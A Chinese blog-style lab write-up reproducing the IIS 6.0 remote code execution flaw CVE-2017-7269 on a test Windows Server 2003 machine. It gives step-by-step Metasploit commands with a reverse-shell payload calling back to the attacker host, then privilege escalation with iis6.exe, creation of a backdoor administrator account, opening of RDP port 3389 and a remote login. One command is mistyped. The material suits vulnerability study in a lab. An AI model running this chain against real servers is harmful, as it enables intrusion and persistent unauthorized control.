iis6.0远程代码执行漏洞复现(CVE-2017-7269)

一.实验环境搭建

1.目标机:windows server 2003 r2

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第1张图片

2.iis配置

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第2张图片

目标机ip:192.168.1.175

二.攻击机器

一台kai liunx

ip:192.168.1.144

三.开始攻击了

exp:https://github.com/zcgonvh/cve-2017-7269

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第3张图片

1.把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第4张图片

2.打开神器Metasploit

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第5张图片

3.输入use命令,use exploit/windows/iis/cve-2017-7269

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第6张图片

4.使用命令show options

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第7张图片

5.设置目标机ip,set RHOST 192.168.1.175

6.设置对面网站,set HttpHost 192.168.1.175

7.设置返回载荷,set payload windows/meterpreter/reverse_tcp

8.设置攻击机ip,set LHOST 192.168.1.144

9.进行溢出,exploit

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第8张图片

10.如果出现错误Exploit completed, but no session was created,有可能是攻击的过多,可以尝试重启,实在不行就恢复快照

11.输入shell命令,来到了我们所熟悉的界面

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第9张图片

12.查看当前用户权限,whoami,发现只是个一般用户权限

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第10张图片

13.cd到网站目录,命令:c:\Inetpub\wwwroot,但是小编这里是没有权限进行创建文件,文件夹等操作的

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第11张图片

14.来到c盘根目录,cd c:\,进行新建文件夹,发现创建成功(实际情况中就只有一个文件夹一个文件夹的寻找了)

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第12张图片

14.按Ctrl + C退出shell,输出y

15.利用Metasploit的上传功能,把提权工具iis6.exe上传到刚刚新建的文件里(提权工具有很多,iis6.exe,pr.exe等等)


16.又回到shell里面确定工具上传是否成功

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第13张图片

17.利用工具进行提权,命令:iis6.exe "whoami",已经是system权限了

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第14张图片

18.进行新建用户,iis6.exe "net user DarkHQ !@#qwe123 /add"

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第15张图片

19.添加用户到管理员,iis6.exe "net localhost administrators DarkHQ /add"

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第16张图片

20.查看远程连接是否打开,没有打开,命令:netstat -an

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第17张图片

21.再上传一个开3389.bat,利用iis6.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面iis6.exe上传方法一样)

命令:iis6.exe "3389.bat"

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第18张图片

22.查看是否打开,netstat -an,已经成功打开

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第19张图片

23.进行远程连接,本地cmd输入命令:mstsc

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第20张图片

24.利用之前新建的管理员成功登录

iis6.0远程代码执行漏洞复现(CVE-2017-7269)_第21张图片

感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!


你可能感兴趣的:(漏洞复现)